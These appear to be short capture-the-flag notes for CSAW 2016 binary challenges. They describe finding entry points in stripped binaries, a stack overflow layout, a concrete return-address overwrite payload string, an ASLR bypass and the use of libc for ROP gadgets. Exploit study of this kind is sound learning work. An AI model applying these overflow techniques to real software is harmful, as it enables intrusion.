- First this program is stripped so we have to find ep with readelf funtion. EP of main function is
0x40061d
- Payload: [buffer]*64 + rbp + ret
- To bypass ASLR we have to know start address of easy function and it's provided
- Actual payload looks like this
'a'*72+'\x0d\x06\x40\x00'+'\x00'*4
- It's python code is at here
- This program also need to find ep, and ep of main function is
0x401087
- To execute this program in local you have to make user which name is tutorial and you have to execute this program with admin permission
- binary file is just gdb and libc is used to find rop gadget and offset between other functions
- If you are korean, look this (site)[http://s0ngsari.tistory.com/entry/CSAW-2016-tutorial] for more information (Not mine)
- My python code is at (here)[https://github.com/parksjin01/ctf/blob/master/2016/CSAW/tutorial.py]